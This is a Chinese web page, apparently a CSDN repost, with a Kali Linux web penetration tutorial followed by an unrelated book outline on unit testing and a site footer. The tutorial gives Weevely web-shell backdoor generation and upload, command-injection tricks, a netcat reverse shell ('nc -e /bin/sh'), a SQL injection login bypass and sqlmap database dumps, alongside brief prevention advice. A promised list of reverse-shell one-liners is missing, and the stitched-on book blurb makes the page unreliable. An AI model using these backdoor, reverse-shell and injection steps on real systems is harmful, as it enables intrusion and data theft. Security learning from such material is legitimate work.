来源:CSDN
Web渗透:如何使用 Kali Linux 来访问目标 PC!什么是 Kali Linux?“Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审核”。
网络信息收集
在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。
一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的另一种方法是使用 bing 和 search ip。
发现子域
使用名为“knock”的工具(通常安装到 Kali 上的 /opt 中)。与 Kali Linux 上的大多数工具一样,Knock 是开源的,可以在https://github.com/guelfoweb/knock找到。
git clone <https://github.com/guelfoweb/knock.git>
cd 进入文件夹。
python knock.py 目标
如果不起作用,尝试使用 --resolve 运行上述命令,然后再次运行上述命令。
发现敏感文件
DIRB 是一个 Web 内容扫描器,它查找现有(或隐藏)的 Web 对象,在Web渗透中非常有用!DIRB 的工作原理是对 Web 服务器发起字典攻击并分析响应(本质上只是尝试不同的文件名并查看是否有响应)。
dirb [目标] [字典] [选项]
1. /:通常表示您位于一个目录中。
2. phpinfo.php:非常有用的信息
3. robots.txt:管理员不希望我们看到的隐藏信息。
利用服务器漏洞
利用服务器漏洞进行Web渗透到常见方式,以下是利用 Web 服务器获得不同结果的一系列方法。
利用文件上传漏洞获取访问权限
Weevely 是一个隐秘的 Web shell,用于模拟类似 telnet 的连接。这可用作后门和/或管理 Web 服务器上的 Web 帐户。
创建后门:
weevly generate [密码] [路径+文件名]
上传文件:
weevly [文件地址]- 连接到文件
在尝试使用工具之前,只需浏览网站并感受一下,寻找功能中的漏洞,特别是网站是否允许上传。
利用代码执行漏洞
始终尝试您看到的任何输入框,因为它们正在执行命令,您也许可以更改该命令。
可以使用" && “或” ; "在unix中,可以在一行中执行多个命令。测试输入框是否允许这样做。
大多数服务器都有 python 和 netcat。
监听传入连接,例如使用 netcat:
netcat -vv -l -p [端口]- 侦听端口 8080 上的连接
IE。nc -e /bin/sh [ip] [端口] - netcat 连接。
下面是您可以执行以获得不同受支持语言的反向连接的命令列表。其中要更改的变量由[HOST_IP]和 表示,可以选择更改端口。请注意,这些都是“一行代码”,因此它们可以在输入框中执行。
预防 Web 服务器漏洞
发生上述情况只是因为服务器允许并且配置错误。
1、文件上传漏洞
·不允许上传不安全的文件。
· 如果您要求提供图像,请确保它是图像,切勿允许 exe 上传。
· 检查文件类型,而不是扩展名。
2、代码执行漏洞
· 不要使用危险的功能,
· 执行前过滤输入
· 如果必须使用函数,请确保在执行之前分析输入。
· 使用正则表达式(regex)。
3、文件包含漏洞
· 禁用 php 中的allow_url_fopen 和allow_url_include 设置(在/etc/php5/cgi/php.ini 中)
· 使用静态文件包含(对文件进行硬编码)
SQL注入和攻击
连接到 mySQL 数据库:
mysql -u [用户名] -h [IP of server]
show 数据库
use [数据库]
show tables
通过注入绕过登录
另一个巧妙的用途是注入 SQL 查询,使得查询最终为SELECT * from accounts where user=‘admin’ and password=‘wrong_password’ or 1=1,这可能会以管理员身份登录我们,而根本不知道密码,因为如果查询评估 1 为,则 and 语句中的第二种情况将为 True等于 1。这在Web渗透中有很大的作用。
发现数据检索 (GET) 中的 SQL 注入
始终尝试在 php 脚本中注入内容(在地址栏中,它看起来像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx确保对符号使用 URL 编码,即。# = %23
按列 100000 排序将返回错误,继续按 1,2,3,4,5 进行排序。
使用 SQLmap 执行上述及更多操作
sqlmap --help
sqlmap -u "[target_url]"
sqlmap -u "[target_url]" --dbs
获取数据库
sqlmap -u "[target_url]" --current-user
获取用户
sqlmap -u "[target_url]" --current-db
当前数据库
sqlmap -u "[target_url]" --tables -D [database]
获取-D数据库中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
获取数据库表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump
获取数据库表中的所有数据。
SQL漏洞防范
·使用过滤器(但可以绕过)
· 使用拒绝列表或允许列表。(但可以绕过)
· 最好的方法是以不允许代码注入的方式对 Web 应用程序进行编码。
· 要执行上述操作,您必须使用参数化语句。(其中数据和代码是分开的)
跨站脚本(XSS)
在浏览网站的人而不是服务器上执行。允许将 javascript 注入到页面上。页面加载时执行代码。
三个主要类型
1. 持久/存储型 XSS
2. 反射型 XSS - 非持久性 XSS。仅当目标访问特制的网址时才有效,例如。target.com/page.php?something=alert(‘xss’)
3. 基于 DOM 的 XSS
使用参数(php 的东西)测试文本框和 url。
将牛肉钩注入易受攻击的页面。如果文本区域有最大长度,请进入开发人员控制台并检查元素并更改最大长度。
XSS漏洞防范
·最小化输入。
· 将用户输入转换为 html 字符符号 so&nsb并使用 代替 & &jsjs;。
· 转义输入。
· 很少信任浏览器内的警报!
自动发现Web漏洞
使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已经安装在 Kali 上。
1. 在应用程序中搜索 ZAP
2. 您必须通过 github 获取此应用程序。
3. chmod +x [文件名]
4. 运行
5. 安装后点击不再持久。
6. 左侧的齿轮图标允许修改选项
7. 如果您单击底部窗口上的绿色加号,则转到活动扫描。然后,您可以在窗口左上角的小面板中更改策略。
8. 在自动扫描中添加 url。
9. 警报下方的左下角显示了所有已发现的漏洞。
10. 如果您右键单击其中一个警报(左下角),然后在浏览器中打开,它将向您显示该漏洞及其如何获取它。
Web渗透归根结底还是几个技术活,所以要学习的东西还是很多的!
第1章简单介绍软件单元测试所包含的概念,包括桩对象和测试驱动函数、测试驱动开发、软件测试贯彻始终、软件测试金字塔、单元测试在传统/敏捷开发模式中的地位、精准测试、单元测试和白盒测试,以及单元测试的FIRST原则和AIR原则。
第2章介绍软件单元测试基础知识,包括动态自动化/手工单元测试、静态自动化/手工单元测试。在动态自动化单元测试中介绍了语句覆盖、分支覆盖、条件覆盖、条件/分支覆盖、MC/DC、路径覆盖和控制流覆盖。
第3章到第5章介绍C语言、Java语言和Python语言的单元测试框架。
第3章介绍C语言动态自动化单元测试框架,包括在Windows下安装C语言运行环境、在Windows和Linux下安装编译CUnit、查看测试报告、CUnit介绍和案例。
第4章介绍Java语言动态自动化单元测试框架,包括在Eclipse中创建Maven项目和配置JUnit与TestNG运行环境、JUnit 4测试框架、JUnit 5测试框架、TestNG测试框架、测试替身、变异测试、利用EvoSuite自动生成测试用例,以及在Jenkins中配置JUnit 4、JUnit 5、TestNG和Allure。
第5章介绍Python语言动态自动化单元测试框架,包括unittest、Pytest及Python的模拟对象和变异测试工具mutpy。
第6章与第7章介绍代码覆盖率工具和代码语法规范检查工具。
第6章介绍代码覆盖率工具,包括C语言覆盖率工具gcov和lcov、Java语言覆盖率工具JaCoCo,以及Python语言覆盖率工具Coverage和pytest-cov。
第7章介绍代码语法规范检查工具,包括Java语言静态分析工具PMD、Python语言静态分析工具flake8和pylint,以及多代码语法规范检查平台SonarQube。
第8章通过两个案例详细介绍TDD。
读者可以根据自己的需求对以上内容进行选择性阅读或者全部阅读。另外,为了巩固大家的学习效果,每一章结尾都有相应的习题。
顾翔凡言:人工智能未来的发展瓶颈在于对知识的更新。唯一不变的是变化,知识发生了变化,人工智能软件能否及时跟进变化,可能阻碍人工智能的使用。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...